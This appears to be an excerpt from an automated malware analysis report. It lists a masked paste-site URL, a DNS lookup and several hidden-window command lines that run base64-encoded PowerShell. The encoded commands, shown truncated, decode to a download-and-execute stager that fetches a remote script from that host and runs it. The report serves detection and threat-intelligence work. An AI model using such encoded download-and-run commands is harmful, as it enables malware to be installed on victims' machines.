Technical Information
- http://pa###.c-net.org/staceconcerns
- 'pa###.c-net.org':80
- http://pa###.c-net.org/StaceConcerns
- DNS ASK pa###.c-net.org
- '<SYSTEM32>\cmd.exe' /C powershell -e cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAIABhAFEAQgBsAEEASABnAEEASwBBAEIAdQBBAEcAVQBBAGQAdwBBAHQA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' powershell -e aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHAAYQBzAHQAZQAuAGMALQBuAGUAdAAuAG8AcgB...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C powershell -e cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAIABhAFEAQgBsAEEASABnAEEASwBBAEIAdQBBAEcAVQBBAGQAdwBBAHQA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAIABhAFEAQgBsAEEASABnAEEASwBBAEIAdQBBAEcAVQBBAGQAdwBBAHQAQQBHADgAQQBZAG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHAAYQBzAHQAZQAuAGMALQBuAGUAdAAuAG8AcgBnAC8AUwB0AG...